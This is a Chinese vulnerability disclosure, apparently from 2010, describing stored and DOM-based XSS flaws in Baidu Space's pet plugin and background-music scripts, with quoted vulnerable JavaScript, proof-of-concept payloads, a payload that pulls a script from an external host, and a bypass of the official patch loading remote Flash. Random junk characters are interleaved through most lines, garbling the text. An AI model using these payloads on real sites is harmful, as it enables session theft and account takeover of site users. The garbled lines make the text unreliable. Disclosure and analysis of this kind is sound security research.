百度空间的宠物插件对用户输入变量未经任何过滤便存储,并不经过滤输出,造成XSS. % r- U- z' [- n; G! w, t. Z8 P
* D/ @9 I& i2 s. P+ Q6 ?1.在http://hi.baidu.com/p__z/modify/sppet中,用户可以输入留言管理,提交后,未过滤直接储存. * s# o% i, [$ B [
2.在http://hi.baidu.com/ui/scripts/pet/pet.js中 2 V3 J; ^% b: Q2 Y6 R i" I% ?- s
& q) f7 w) T- ~将输出一段HTML:<p style="margin-top:5px"><strong>’+F[2]+"说:</strong>"+BdUtil.insertWBR(F[0], 4)+’</p>
+ f, Y* K; f0 [& q其中BdUtil.insertWBR为
[2 H7 z1 N8 Q* b, t6 o( S6 Ifunction(text, step) {
! r( u0 B- t' n; L var textarea = textAreaCache || getContainer();
o6 A' _$ f1 Q2 d9 _* S if (!textarea) { 2 _; l2 B+ D3 T" m
return text;
" A+ |3 z O3 p! G! x+ J$ K; ~ }
) w* V( K. M: g9 t0 y( g- _/ i0 C textarea.innerHTML = text.replace(/&/g, "&").replace(/</g, "<").replace(/>/g, ">");
! g! e% J! i9 p c; a, W) A var string = textarea.value;
! Q+ I/ N3 U5 N" r0 R. Z var step = step || 5, reg = new RegExp("(\\S{" + step + "})", "gi"); 1 X) E* Q% U$ y4 E
var result = string.replace(/(<[^>]+>)/gi, "$1<wbr/>").replace(/(>|^)([^<]+)(<|$)/gi, function (a, b, c, d) {if (c.length < step) {return a;}return b + c.replace(reg, "$1<wbr/>") + d;}).replace(/&([^;]*)(<wbr\/?>)([^;]*);/g, "&$1$3;"); & y; z- S0 d; S- P. m
return result;
2 C+ Y6 c$ W' B2 F3 f" B} 5 {* H/ K' J! b2 J
在首页中,textAreaCache 和 getContainer()均不存在,故!textarea为true,未经过滤直接return text.造成XSS.
& Q4 Y! O6 Y& j- p: ^1 r9 u测试代码:宠物留言管理处输入:<img src=# onerror=alert(/qing/)>
" B% a) j, B% ]4 ~ K0 T) f 2 r% ~; E0 m/ B
二:creatbgmusic() Dom-Xss Bug
. r/ |7 Z/ P8 h6 S+ [' u% a百度空间的Javascript Dom函数creatbgmusic()在输出变量bgmusic*没有进行过滤,导致可以通过initBlogTextForFCK()函数构造容易HTML代码,最终导致xss漏洞 ! B* J! D& S, g# l* G
0 G4 i4 C% u" {! K
在http://hi.baidu.com//js/bgmusic.js?v=1.0.js 代码: ' ? ^" S# \' [" a' e* h( s
- r2 w; [: A$ _9 cfunction creatbgmusic(murl, musicnum, IsMusicHide, IsMusicLoop, IsMusicAutoPlay, unknow, functype) { + D0 M- ?. R1 w2 f
//传入的murl赋值到bgmusic1和bgmusic2中
8 j6 ~+ S* c( F; E% ?" A //可以通过构造类似代码来闭合标签如 "><img src=2 onerror=s=document.createElement("script");s.src="http://www.80vul.com/sobb/alert.php";document.body.appendChild(s);>#1
8 O& I6 s3 u5 c var bgmusic1 = "<OBJECT id=phx width=100% classid=clsid:6BF52A52-394A-11D3-B153-00C04F79FAA6 " + (IsMusicHide ? "height=45" : "") + ">" + "<PARAM NAME=\"URL\" VALUE=\"" + murl + "?t=" + Math.random() + "\">" + " <PARAM NAME=\"rate\" VALUE=\"1\">" + " <PARAM NAME=\"balance\" VALUE=\"0\">" + " <PARAM NAME=\"currentPosition\" VALUE=\"0\">" + " <PARAM NAME=\"defaultFrame\" VALUE=\"\">" + " <PARAM NAME=\"PlayCount\" VALUE=\"" + (IsMusicLoop ? 100 : 0) + "\">" + " <PARAM NAME=\"DisplayMode\" VALUE=\"0\">" + " <PARAM NAME=\"PreviewMode\" VALUE=\"0\">" + " <PARAM NAME=\"DisplayForeColor\" VALUE=\"16777215\">" + " <PARAM NAME=\"ShowCaptioning\" VALUE=\"0\">" + " <PARAM NAME=\"ShowControls\" VALUE=\"1\">" + " <PARAM NAME=\"ShowAudioControls\" VALUE=\"1\">" + " <PARAM NAME=\"ShowDisplay\" VALUE=\"0\">" + " <PARAM NAME=\"ShowGotoBar\" VALUE=\"0\">" + " <PARAM NAME=\"ShowStatusBar\" VALUE=\"0\">" + " <PARAM NAME=\"ShowTracker\" VALUE=\"1\">" + " <PARAM NAME=\"autoStart\" VALUE=\"" + (IsMusicAutoPlay ? 1 : 0) + "\">" + " <PARAM NAME=\"AutoRewind\" VALUE=\"" + (IsMusicAutoPlay ? 1 : 0) + "\">" + " <PARAM NAME=\"currentMarker\" VALUE=\"0\">" + " <PARAM NAME=\"invokeURLs\" VALUE=\"0\">" + " <PARAM NAME=\"baseURL\" VALUE=\"\">" + " <PARAM NAME=\"volume\" VALUE=\"100\">" + " <PARAM NAME=\"mute\" VALUE=\"0\">" + " <PARAM NAME=\"stretchToFit\" VALUE=\"0\">" + " <PARAM NAME=\"windowlessVideo\" VALUE=\"1\">" + " <PARAM NAME=\"enabled\" VALUE=\"1\">" + " <PARAM NAME=\"EnableFullScreenControls\" VALUE=\"0\">" + " <PARAM NAME=\"EnableTracker\" VALUE=\"1\">" + " <PARAM NAME=\"EnablePositionControls\" VALUE=\"1\">" + " <PARAM NAME=\"enableContextMenu\" VALUE=\"0\">" + " <PARAM NAME=\"SelectionStart\" VALUE=\"0\">" + " <PARAM NAME=\"SelectionEnd\" VALUE=\"0\">" + " <PARAM NAME=\"fullScreen\" VALUE=\"0\">" + " <PARAM NAME=\"SAMIStyle\" VALUE=\"\">" + " <PARAM NAME=\"SAMILang\" VALUE=\"\">" + " <PARAM NAME=\"SAMIFilename\" VALUE=\"\">" + " <PARAM NAME=\"captioningID\" VALUE=\"\">" + " <PARAM NAME=\"Visualizations\" VALUE=\"1\">";
9 l z3 P( R: @- x; d/ w# v! q% _ if (musicnum <= 1) { 0 m8 t; W( v( B1 q$ q
bgmusic1 += " <PARAM NAME=\"uiMode\" VALUE=\"mini\">"; + C: p, X2 j; K( }
} . V _& X5 ]$ a" w8 g4 E# M. ?* x& G$ M" K
bgmusic1 += "</OBJECT>";
6 ^0 B: |, H1 `. |2 ^4 h, w# w var bgmusic2 = "<EMBED src=\"" + murl + "?t=" + Math.random() + "\" width=\"100%\" " + (IsMusicHide ? "height=45" : "") + " type=\"application/x-mplayer2\" invokeurls=\"0\" autogotourl=\"false\" autostart=" + (IsMusicAutoPlay ? 1 : 0) + " loop=" + (IsMusicLoop ? 1 : 0) + " quality=\"high\""; 0 a# r0 t+ z* ?' t; D/ _8 [
if (musicnum <= 1) { $ U; P# ~1 Y7 d- ^; J* |0 s
bgmusic2 += "showcontrols=\"1\" showpositioncontrols=\"0\" "; 7 C% f; ^" x2 C. A5 E
} 5 S# [* O" a2 P% Q; B0 n- s
bgmusic2 += "> </EMBED>"; / ]# X5 F; Y, u5 Y9 n
var bgmusic3 = "<div id=\"m_bgmusic\" class=\"modbox\">\u5BF9\u4E0D\u8D77\uFF0C\u60A8\u5C1A\u672A\u5B89\u88C5windows media player\uFF0C\u65E0\u6CD5\u6B23\u8D4F\u8BE5\u7A7A\u95F4\u7684\u80CC\u666F\u97F3\u4E50\uFF0C\u8BF7\u5148<a href=\"http://www.baidu.com/s?wd=windows+media+player+%CF%C2%D4%D8&cl=3\" target=\"_blank\">\u4E0B\u8F7D\u5E76\u5B89\u88C5</a><br><br></div>";
& d0 k5 O, [1 z3 w) c1 } var bgmus = detectWMP(); % O7 @) C8 L- o, o- a
if (functype == "FckMusicHelper") {
Z* b9 E3 {- c- D ~# L7 k if (bgmus.installed) { . k8 F( `# J- m3 }. _9 @
if (bgmus.type == "IE") {
2 h6 Q2 [- z) a, v7 |& o return bgmusic1; 9 E7 G4 k2 Z0 G
} else if (bgmus.type == "NS") {
; _) {# m; h; U- t2 ?+ n return bgmusic2;
! [6 j2 c5 I) L( X& ? }
, l. O; O4 O1 g( ] } else { + w& F: B" {0 q1 Z( x) D
return bgmusic3; ! |. ? a d. F" t6 N0 f" B
}
( k' Y6 j* i4 \. P. z1 Q) Y2 c } else {
) E( l! v) C+ i: A J) F8 k if (bgmus.installed) { 3 w! y* `. c& ?) ?( E( u( \
//document.write 直接输出bgmusic变量 导致xss
1 r2 L# _3 K% {' }) y if (bgmus.type == "IE") {
4 N% h+ U- [: U0 N document.write(bgmusic1);
$ |/ S1 N) X$ e% e } else if (bgmus.type == "NS") { / E6 l, ]: u$ I; ~( _6 t- D* h
document.write(bgmusic2); ' S+ n! } y9 V3 F% f" I. w
}
. v& c6 ?- D6 S; E$ P* ?# \- V } else { 5 Z" d; D' m$ h" C# F( Q" G+ q
document.write(bgmusic3); & w: e4 C9 v6 g' O6 C2 z
} 7 l0 s+ @( n& o9 |3 N
return "";
( f# N0 ?2 s5 J7 R+ b9 Z' M }
% y, t" Q' a$ N) g7 Z}
0 ~* X8 F& T9 `& g" \3 l. v! T' D
/ k) X0 U! x- h在看百度空间里的initBlogTextForFCK()函数,调用了creatbgmusic() ,代码如下: y6 C+ E, \9 {9 ^. K! G$ ~
# H2 ]. O0 S% G$ q$ v- f! B6 e4 efunction initBlogTextForFCK(){ ( m4 q4 q4 L J& e. A: o
//fck init music " j3 E) N) H/ Y- ?0 P2 V6 d- a2 ^
if(window.Node){Node.prototype.replaceNode=function(Node){this.parentNode.replaceChild(Node,this);}}
9 g: ]1 K) B( I% ?' xvar imgBox=document.getElementsByName(’musicName’); //取得了文章中的所有name="musicName"的标签数组
! G" {0 y# c, g+ H* Vvar isAutoPlay=true;
; r: V% K( G7 o# efor(var i=0,n=imgBox.length;i<n;i++){ //然后遍历.
, x& `) v( G- `$ m( ?$ l5 W var img=imgBox; 7 d' L" O2 s2 g1 ~
if(img.getAttribute(’rel’)){
# |% D' A$ M2 L var musicSrc=img.getAttribute(’rel’); //取得标签中rel的值,赋值给musicSrc
4 i/ q7 W/ o# i/ D! t7 x4 i var musicDiv = document.createElement("SPAN");
* C, o) P. z) V- ?" c5 Z var tmp=musicSrc.substr (musicSrc.indexOf(’#’)+1, 1); //以"#"为界分割musicSrc字符串,提取自动播放的flag[tmp]
. c1 X; R' X1 ?' ]
6 a7 U$ A0 t3 J: g0 P* r* R .......................... , z* J' c) ~) E, x. u" {
1 w: j+ c" k3 \4 {* G( _ //直接将部分musicSrc传入creatbgmusic函数.在creatbgmusic函数直接把传入的murl赋值到bgmusic1和bgmusic2中并document.write出来. + a+ m) g- S, I
var shtml=creatbgmusic(musicSrc.substr(0,musicSrc.indexOf(’#’)),1,true,false,tmpAutoPlay,tmpAutoPlay,’FckMusicHelper’); $ B: `8 B+ g8 o5 z( x1 R+ w4 G
shtml=shtml.replace(’width=100%’,’width=200’).replace(’width="100%"’,’width=200 height=45’); img.replaceNode(musicDiv); * `6 z7 n* i0 \1 S0 f
musicDiv.innerHTML=shtml;
$ c ?7 k8 A" n$ @, }# n" ^- W i--;n--;
# i! f: K' m- r3 |9 ]7 `( F } ! L$ N" s5 ^" V( l0 |' l# y& U
} * T# v+ b- ]" z$ z
8 w. c; X. `" K% W从上面的代码分析可以看出:在所有的参数传递中,我们没有看到过滤.百度空间的富文本编辑器的过滤模式是基于HTML语法的,不会过滤掉一个属性的值中的HTML标签.所以我们可以精心构造一个的恶意的标签,在JS进行DOM操作后引起XSS.
4 x# }$ ], o# K; f) R# [
/ |0 L% |& Q" z# I Y5 t" @9 ?" H& v, K测试方法:<img width="200" height="45" name="musicName" rel=’"><img src=2 onerror=alert(/qing/)>#1’ src="http://hi.baidu.com/fc/editor/skins/default/update/mplogo.gif"/>
4 K' u: C# V. i# e+ |5 F
: |) _8 T0 S' J等待官方补丁
$ _5 t: n+ A0 h
0 m, H' C( B/ D% ?" b4 {update 2010年5月13日 5 O% v7 C; [, `$ a1 ?- k/ B1 ]+ @
, q( q4 c8 E0 u7 A& v* U, ?
官方补丁:
" Q6 W5 m; n1 ~/ I; C' ^& Z) M. u' r9 r8 e+ B
var shtml=creatbgmusic(musicSrc.substr(0,musicSrc.indexOf(’#’)),1,true,false,tmpAutoPlay,tmpAutoPlay,’FckMusicHelper’);
6 j. h; }' `9 P$ Z- [- d6 c' J9 ]3 q改为: 3 J& _9 H4 x, \% R
var shtml=creatbgmusic(musicSrc.substr(0,musicSrc.indexOf(’#’)).replace(/[\s><()]+/g,’’),1,true,false,isAutoPlay,isAutoPlay,’FckMusicHelper’); + \ q9 ^) Y2 T6 s
) Q& I2 c$ d; e) M7 Q8 J
update 2010年5月13日 21:50:37 ( Q7 K8 P) P- o6 T8 i+ V; V
4 K9 d% v3 ^+ A; H
补丁存在漏洞 没有过滤" 可以继续跨:
9 {7 v% U! D" u* [) I0 h7 B. w+ E. E1 M6 C& n, g$ c' ?, q
NEW POC: 7 t9 x" i" B0 Y! b5 t
. ^: r" q8 R) T
<img width="200" height="45" _fcksavedurl=" http://hi.baidu.com/fc/editor/skins/default/update/mplogo.gif" src="http://hi.baidu.com/fc/editor/skins/default/update/mplogo.gif" rel=’http://www.xsser.net/pz/js.swf" & @8 M7 X4 w2 [! G, z: ^
; m4 U& Z+ ^- d+ u: {6 Jallowscriptaccess="always" type="application/x-shockwave-flash"#2’ name="musicName"/>
: X/ \! \/ j$ \% o & I$ k L: d- O0 }# q
|